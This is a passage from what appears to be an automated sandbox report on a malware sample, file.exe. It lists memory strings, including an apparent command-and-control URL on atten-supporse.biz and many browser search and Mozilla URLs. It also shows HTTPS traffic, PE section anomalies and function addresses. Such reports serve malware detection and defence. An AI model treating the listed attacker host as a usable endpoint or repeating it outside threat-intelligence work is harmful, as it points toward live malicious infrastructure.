Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2259012497.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344169345.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342603560.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300247730.0000000001000000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299846192.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344351188.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235698406.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282437741.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261438179.0000000001003000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344299899.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344169345.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: file.exe, 00000000.00000002.2344104986.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/B
Source: file.exe, 00000000.00000003.2259012497.0000000001006000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342509228.000000000100F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300143521.000000000100F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337981805.000000000101D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299804026.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261632719.000000000100D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300143521.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344368616.0000000001010000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282551373.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261414653.0000000001009000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344400074.000000000101E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342950053.000000000101C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: file.exe, 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api)
Source: file.exe, 00000000.00000003.2212521763.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212500277.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api66
Source: file.exe, 00000000.00000002.2344169345.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiC
Source: file.exe, 00000000.00000002.2344169345.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiF
Source: file.exe, 00000000.00000003.2342586509.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337981805.000000000101D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299804026.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300143521.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342950053.000000000101C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiq
Source: file.exe, 00000000.00000002.2344169345.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/v8
Source: file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2238083604.0000000005932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2238083604.0000000005932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49727 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D6170	0_2_000D6170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BE2A9	0_2_000BE2A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D33A0	0_2_000D33A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D15F0	0_2_000D15F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE690	0_2_000EE690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DC6D7	0_2_000DC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B97B0	0_2_000B97B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B87F0	0_2_000B87F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BA960	0_2_000BA960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C6B7E	0_2_000C6B7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E9B90	0_2_000E9B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E6C40	0_2_000E6C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDCF0	0_2_000EDCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E6F90	0_2_000E6F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DBFDA	0_2_000DBFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C0FD6	0_2_000C0FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DBFD3	0_2_000DBFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274023	0_2_00274023
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015D012	0_2_0015D012
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00146009	0_2_00146009
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00136030	0_2_00136030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00137035	0_2_00137035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011E036	0_2_0011E036
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0016503F	0_2_0016503F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013F023	0_2_0013F023
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012A02B	0_2_0012A02B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EA030	0_2_000EA030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011A051	0_2_0011A051
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00160042	0_2_00160042
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BE06A	0_2_000BE06A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D5F7D	0_2_000D5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B9070	0_2_000B9070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027905B	0_2_0027905B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00118091	0_2_00118091
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DD085	0_2_000DD085
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013D09A	0_2_0013D09A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014A083	0_2_0014A083
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015B08C	0_2_0015B08C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D80B0	0_2_000D80B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014C0AB	0_2_0014C0AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001240C4	0_2_001240C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E80D9	0_2_000E80D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001530FC	0_2_001530FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001390FD	0_2_001390FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001500EA	0_2_001500EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013B112	0_2_0013B112
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DA100	0_2_000DA100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00158103	0_2_00158103
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0016310B	0_2_0016310B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00134160	0_2_00134160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013119B	0_2_0013119B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012F19F	0_2_0012F19F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C7190	0_2_000C7190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001671AE	0_2_001671AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001611C2	0_2_001611C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E01D0	0_2_000E01D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011E1F6	0_2_0011E1F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001221FB	0_2_001221FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015D1E0	0_2_0015D1E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011F1EB	0_2_0011F1EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B81F0	0_2_000B81F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015A1EE	0_2_0015A1EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013521B	0_2_0013521B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B6200	0_2_000B6200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00144238	0_2_00144238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00138227	0_2_00138227
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00123276	0_2_00123276
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012C276	0_2_0012C276
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B4270	0_2_000B4270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D2270	0_2_000D2270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00158295	0_2_00158295
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00164299	0_2_00164299
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001552B4	0_2_001552B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001492A7	0_2_001492A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C92BA	0_2_000C92BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE2C0	0_2_000EE2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001622C1	0_2_001622C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D92D0	0_2_000D92D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001482ED	0_2_001482ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012E305	0_2_0012E305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E533A	0_2_000E533A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00130326	0_2_00130326
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011C341	0_2_0011C341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002DD37C	0_2_002DD37C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014F341	0_2_0014F341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BB351	0_2_000BB351
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014D37E	0_2_0014D37E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B9360	0_2_000B9360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CC360	0_2_000CC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015239B	0_2_0015239B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012B380	0_2_0012B380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013A385	0_2_0013A385
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012D38A	0_2_0012D38A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013838A	0_2_0013838A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014B3B0	0_2_0014B3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001233BE	0_2_001233BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001403A1	0_2_001403A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015C3AD	0_2_0015C3AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EA3F0	0_2_000EA3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015640D	0_2_0015640D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015943F	0_2_0015943F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CD420	0_2_000CD420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013C429	0_2_0013C429
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E6430	0_2_000E6430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BD44C	0_2_000BD44C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00147473	0_2_00147473
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00157460	0_2_00157460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B7470	0_2_000B7470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012849F	0_2_0012849F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011248A	0_2_0011248A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012E4AF	0_2_0012E4AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001464E8	0_2_001464E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001504E9	0_2_001504E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012F51A	0_2_0012F51A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0016651D	0_2_0016651D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00139502	0_2_00139502
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0016753A	0_2_0016753A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00395505	0_2_00395505
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011752F	0_2_0011752F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011955D	0_2_0011955D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013154D	0_2_0013154D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015F565	0_2_0015F565
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C6571	0_2_000C6571
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002775AB	0_2_002775AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00161581	0_2_00161581
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015658E	0_2_0015658E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011D58C	0_2_0011D58C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013B5B4	0_2_0013B5B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015A5BA	0_2_0015A5BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001445AC	0_2_001445AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001535D8	0_2_001535D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001485DB	0_2_001485DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011B5C3	0_2_0011B5C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001415C0	0_2_001415C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001375EF	0_2_001375EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00272634	0_2_00272634
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00127639	0_2_00127639
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013563E	0_2_0013563E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012A640	0_2_0012A640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014E643	0_2_0014E643
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00110671	0_2_00110671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014B671	0_2_0014B671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013F67A	0_2_0013F67A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011467A	0_2_0011467A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00113663	0_2_00113663
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C2670	0_2_000C2670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D5670	0_2_000D5670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00151691	0_2_00151691
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026E6B7	0_2_0026E6B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B6690	0_2_000B6690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E6690	0_2_000E6690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001556A6	0_2_001556A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001346A7	0_2_001346A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015C6AD	0_2_0015C6AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E76B0	0_2_000E76B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001426CD	0_2_001426CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012B6C9	0_2_0012B6C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C56D0	0_2_000C56D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001646F6	0_2_001646F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D66E7	0_2_000D66E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00116709	0_2_00116709
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000D0717	0_2_000D0717
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012C70D	0_2_0012C70D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00121724	0_2_00121724
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C8731	0_2_000C8731
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015875F	0_2_0015875F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00115748	0_2_00115748
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00138770	0_2_00138770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00140770	0_2_00140770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000DB763	0_2_000DB763
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013676A	0_2_0013676A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014E76E	0_2_0014E76E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00133793	0_2_00133793
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001547B4	0_2_001547B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000C67A5	0_2_000C67A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0012D7BF	0_2_0012D7BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001527A5	0_2_001527A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001427A3	0_2_001427A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014B7A9	0_2_0014B7A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001437F5	0_2_001437F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001577F3	0_2_001577F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011C7E6	0_2_0011C7E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001237EE	0_2_001237EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001457E9	0_2_001457E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00160811	0_2_00160811
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00111800	0_2_00111800
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0015E828	0_2_0015E828
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014A859	0_2_0014A859
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00125848	0_2_00125848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0011784A	0_2_0011784A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013D87A	0_2_0013D87A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00147895	0_2_00147895
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002818BC	0_2_002818BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013C8B5	0_2_0013C8B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B38C0	0_2_000B38C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026B8F0	0_2_0026B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013A8F6	0_2_0013A8F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000CD8E0	0_2_000CD8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001128FE	0_2_001128FE
